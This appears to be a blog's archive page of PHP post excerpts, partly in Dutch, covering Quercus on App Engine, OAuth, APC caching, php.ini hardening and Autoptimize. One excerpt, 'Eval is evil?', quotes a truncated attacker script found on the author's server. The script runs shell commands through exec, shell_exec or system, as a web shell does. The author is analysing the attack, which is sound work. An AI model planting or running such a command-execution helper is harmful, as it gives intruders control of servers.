Google App Engine project template for PHP (with Quercus)

So you’re a wanna-be developer who’d love to deploy in the cloud, but you only¬† “know” PHP? Well, as you might already have read elsewhere Caucho, the company behind Resin, has a 100% Java GPL’ed implementation of PHP5 called Quercus that can be used to run PHP on GAE. It took me some time to […]

PHP OAuth extension: trial, error and success

I’ve been experimenting with the PHP OAuth PECL extension over the last few days and initially ran into some small problems getting it to function correctly. So for the sake of making this world wide web an even better place, here are some error-messages you might encounter and what you could do to resolve them: […]

Fun with caching in PHP with APC (and others)

After installing APC, I looked through the documentation on php.net and noticed 3 interesting functions with regards to session-independent data caching in PHP; apc_store; store a variable in cache apc_fetch; retrieve the variable from cache apc_delete; remove the variable from cache When talking about caching, apc_delete might not be that important, as apc_store allows you […]

PHP security: Eval is evil?

Naar aanleiding van mijn vorige post een beetje naar de tooltjes zitten kijken die de script kiddies op mijn serverken loslaten. Een voorbeeldje: <?php echo “549821347819481<br>”; $cmd=”id”; $eseguicmd=ex($cmd); echo $eseguicmd.”<br>”; function ex($cfe){ $res = ”; if (!empty($cfe)){ if(function_exists(‘exec’)){ @exec($cfe,$res); $res = join(“\n”,$res); } elseif(function_exists(‘shell_exec’)){ $res = @shell_exec($cfe); } elseif(function_exists(‘system’)){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); […]

PHP kan uw gezondheid ernstige schade berokkenen

PHP is krachtig gereedschap. Net als met een goeie cirkelzaag of een stevige voorhamer kun je met PHP veel goeds, maar ook veel slechts doen. Volgende eenvoudige wijzigingen in php.ini zouden je installatie veel veiliger moeten kunnen maken; Zet “allow_url_fopen” op “off” zodat er met PHP via remote files geen ‘vijandige’ code kan binnengehaald worden. […]

Autoptimize: no more broken pages due to CSS/ JS not found!

When cached HTML links to deleted Autoptimized CSS/ JS the page is badly broken … no more with a new (experimental) option in AO27 to use fallback CSS/ JS which I just committed on the beta branch on GitHub. For this purpose Autoptimize hooks into template_redirect and will redirect to fallback Autoptimized CSS/ JS if […]